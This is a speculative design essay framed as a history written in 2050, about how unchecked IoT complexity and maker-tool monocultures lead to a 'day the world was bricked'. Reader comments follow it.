"What if we could put the power of the Internet of Things (IoT) into the hands of many more people than ever before?"
That may have been the question they asked themselves when they started to build it. The historical records from that time are patchy at best as we work to rebuild civilization, now decades after the world was bricked. We do know that what started as a ground up maker movement for hardware development soon ballooned into a full-fledged IoT authoring tool sometime around the year 2015 or 2016. It reduced the time to develop blended hardware and software products from months to days and finally to hours and minutes. Makers began building prototypes and deploying products faster than they could create and share PowerPoints to explain them (note: while we don't know what the origin of the word "PowerPoint" is, we believe it has to do with some sort of sleep aid for corporations that could at times be illustrative of something called "synergy"). The resulting proliferation of connected things entering the market seemed like the beginnings of a new industrial revolution.
Lurking behind the scenes, complexity began to quietly run amok. Each creator had the power to put the most complexity possible into solving the least complex of tasks. Entire operating systems that were once built to run as general purpose environments — used by knowledge workers who spent their careers figuring out the idiosyncrasies of their PC — were gleefully embedded in doorbells that never needed to communicate more than whether they were pushed or not.
"Why not?"
"You never know when we might want to add a feature!"
We have uncovered a documentary from the century that preceded the apocalypse that was apparently created to warn future generations of the dangers ahead. So while we believe some citizens of that era understood the risks, they stood idly by as the world raced towards doom. The tale involves a sorcerer's apprentice who gains a new magical power and soon discovers — too late — that his dreams will lead to unintended consequences — as brooms and buckets of water overwhelm him in a deluge. The creators of the so-called "Internet of Things" soon saw their plans washed away by a sea of magical thinking as well.
Two early signals from the impending doom are telling as we look back in retrospect. In the mid 2000's it was discovered that a software worm was wiggling its way into programmable logic controllers (PLCs). The things that are used in factories to spin up, modulate, and slow down mechanical functions. These basic devices had been in use for decades to automate factories. The worm, called Stuxnet, was apparently designed to seek out and infect just the PLCs made by a certain set of companies that sold their wares to middle-eastern countries. If the code ever found itself spinning up a centrifuge (to say, purify a radioactive material to make bombs) it would begin to randomly speed up and slow down and in effect destroy the carefully controlled process. We can only imagine that in matters of nuclear war these sorts of deceptions could happen, after all they were trying to save the world. It reminds this historian more of the tale of the band playing on the deck of the Titanic as it sank beneath the waves.
The second signal was far more insidious and shocking. In the year 2015 one of the largest automakers in the world was discovered to have written behaviors into their "things" so that if the vehicles (in this case diesel powered cars touted for their eco-friendliness) ever found themselves being tested by environmental protection groups (and discovered they were being subjected to just this wheel rotation speed, or just that cycle of speeding up and slowing down), the car would send false signals to appear to be far more green than it really was.
What is important about that event is that a hardware modification could have been discovered — that odd exhaust pipe attachment or module with wires running into the ignition system. But a software behavior lurking inside of a physical thing may have been impossible to detect, hidden as it was within millions of lines of code. Given that this deception turns out to have been going on for years (by one of the most upstanding corporate entities in the world at that time), we can only imagine what other early examples of connected things were co-opted for unlawful or damaging effects.
What was so easy for creators to imagine and build soon drove a shift of complexity from the designer's shoulders at the time of birth to the end user's shoulders during the products lifetime. As more and more connected things begged for attention or worse yet, as noted above, colluded with their makers to pull off nefarious schemes, things began to run out of control.
A building with over 28,000 sensors was already a reality in that early time and yet the kernel of an idea, to shift from design for the birth of a disconnected product or place, to the design for its entire lifetime and operation, had yet to find widespread acceptance. Each thing, just like each bucket of water and mop, only asked that IT be paid attention to. The things naturally wanted to take advantage of the Internet part of their thingness and get updated regularly. They sometimes needed to get fixed at random times when something ran amiss or some dangerous bug was discovered. But the myopia of each creator's vision disregarded the relentless increase of connected things in a single person's or organization's life. Just like those mops set loose on the world, emergent behaviors began to arise. This wasn't surprising to some observers at the time, after all theories about the mind from that era note that consciousness itself may bootstrap up from a vast number of individual (but connected) neurons. They even knew then that one couldn't slice a brain up and "find" consciousness residing in any particular thing inside the brain. Many IoT products just started off dismaying users, begging for their owner's attention like a class of inquisitive three year olds who were pretty sure the world revolved around only their own needs. But the relentless increase of connected things surrounding the users soon led to not only dismay but also resignation.
Looking back at the disaster from this mid-century year of 2050 we are finally able to dissect and expose where the seeds of the event were planted. History books have now tracked the "patient zero" of the apocalypse to a place called Pier 9 built by a company that has now been relegated to the history books known mysteriously as Autodesk. While we can find no record of the company actually making autos or desks themselves they were instrumental in helping others build those things and many other parts of the physical world.
They had embraced the idea of democratizing the act of making things so that far more people could participate in the act of creation. They lowered the friction so that a generation of emerging makers could wield the power of the industrial revolution and enterprise manufacturing for customers as young as four or five years old (seeTinkerplay). This started out well as more entrepreneurs, parents, children, and organizations found that the friction of making physical things was so low they could make solutions that were more capable than the traditional design/manufacturing cycle that had characterized the 20th century. Media was also democratized and new user-generated stories abounded. It seemed like the world was made new as billions of voices could finally be heard. People began to talk about "getting every brain on deck" to solve the hardest problems in the world.
But something strange happened when those things became easier to build with new behaviors embedded directly inside of them (in the form of code) and those things began to talk to each other. The rise of authoring tools like 123D Circuits and 3D printers that could "print" behaviors, connectivity and intelligence directly into things may have been the leading turning point in the exponential increase of complexity in the world.
While the construction of things made of atoms was (and is to this day) naturally bounded by the real world costs of mining and refining and moving materials, things made out of bits were (and are still) practically "free" to copy, change and deploy out into the world. Soon, just like the fabled Amazon fostered a flourishing of self-publishing and the discovery of new authors, the early days of Autodesk's IoT offerings were heady with early stories of underdogs building amazing connected devices and finding fame and fortune.
"A book from that time named Trillions warned that the act of software development for physical things was more akin to literature than engineering. In this regard, software is more like literature than like a physical artifact: Its quality varies widely with the talents of the individual creator. But unlike literature, the result of such an effort is a product that is destined to be used over and over again by an end user whose motivation for its use is typically not recreational. Indeed, software often runs without anyone's conscious choice; it's just part of what happens in the world." -- Trillions, Lucas, Ballay, McManus, 2012
While there was a great deal of top down engineering built into the hardware part of the IoT, largely for ultra-reliability — in the form of battle tested chip designs with billions of transistors that worked day in and day out running code, Moore's Law and the development of authoring tools for Very Large Scale System Integration (VLSI) hid the need for the bottom up resiliency that natural ecologies have found to be necessary.
In a sense those early creators of computer chips abstracted away some of the messy problems that plagued creators of complex computational things. So some blame for the collapse can be ascribed to them as well. We must also note that the rise of only a few dominant operating systems living on those ultra-reliable chips (and being easily embedded by beginners into every new thing produced by Autodesk's authoring tools) could be a contributory factor to consider when making your final judgment. This seemingly benign artifact of the history of computing meant that the code being built for an ultra complex system was based on only a few strains of a single kind of "organism." It appears that the idea of a systems view was missing and the ability to simulate the emergent properties of things connected to other things in any meaningful way was non-existent. When the apocalypse hit very few products built during this flourishing of connected things had enough genetic variety to survive. In retrospect the world didn't have a chance of making it through the infancy of the Internet of Things.
Bottom up resiliency may be what the maker movement thought it was providing. But because all that work was being done on a very few strains of computational organisms — with no scaffolding from a well-structured ecosystem — they were driven to crash among the rocky shores of the disaster by the siren call of empiricism. "With enough eyeballs every bug is shallow," you could hear them declare, without realizing they were all focusing their attention under one parking lot light as they searched for their lost keys.
While it's seductive to think that we could ever rely on a purely bottom up approach to solving problems — by giving many more people the ability to make ever more complex things — it amounts to a philosophy that at best was described by a scientist at the time as "plug and pray." (See YouTube video).
Empiricism was the watchword of the maker movement, no theorists need apply and science appears to have taken a backseat to the explosive pop culture movement of the time.
The day the apocalypse hit was just like any other. People went to work, played with their children, and enjoyed the benefits of a connected life. By mid afternoon people were starting to feel confused by the actions their products were asking them to take, but by this time they had become so reliant on their connected things that they ignored the logic and just did as they were told. By the end of the day all of their carefully crafted lives, with sensors and products and places that seemed to be able to predict what they wanted before they even asked for it, were cut off.
It appears to have begun at 1:32PM Eastern time. Details aren't known who started it or how many people were involved willingly in the collapse and how many machines participated in what historians have called the Internet of Bricked Things and what we now know simply as the day the World was Bricked. But what is known is that by 6:05PM the promise of the so-called Internet of Things lay in ruin. Most of that connected stuff couldn't get a connection and had been permanently turned into inert chunks of material only useful and as smart as the common construction materials at the time known as bricks. Ten years later we were still digging out.
What is known is that a technique called "Man in the Middle" from the cyber security world was definitely involved. It turns out as more and more systems abstracted away the hard parts of the collection of things — so that amateurs could play — the tools tried to make more decisions on their own (a process called Machine Learning). Unfortunately things became far more naked to attack. The "Man in the Middle" approach allowed for a product or products to spoof the systems and send false signals up the chain, polluting the same tools that had allowed so many to create so much. The cascade was quick and deadly, as more and more systems believed the false claims they began to make faulty decisions and assert ever more preposterous actions for their humans to take. Just like the famous "flash crash" that swept through Wall Street in 2010, the battle happened largely among algorithms fighting for dominance on the social network. Unlike the "flash crash," this time those algorithms controlled most physical things and places in the world.
Create a Core77 Account
Already have an account? Sign In
By creating a Core77 account you confirm that you accept the Terms of Use
Please enter your email and we will send an email to reset your password.
Comments
My take was only that all the makers need more 'ecologically diverse' strains of code to foundate their ideas, and that maybe some products need to stay running on very Spartan, specific firmware. It's a way to prevent a single-point failure and in more general practice one that prevents your doorbell from being susceptible to a windows-based virus.
This reminds me of some older Tom Scott videos that I can't link to because of glorious websense. I couldn't help but read this article in his redshirt-clad voice.
Some good points made here. I love the street light metaphor. However, it's also a bit elitist, implying 'amateurs' shouldn't be allowed to make things that become part of the daily lifes infrastructure. Everyone starts out as an amateur. Steve Jobs started out with the Apple II and a total amateur (there are thousands of examples of this). There's a bit of fear mongering happening here as well. I agree we should be careful, but, if we're too careful, nothing, at all, will happen.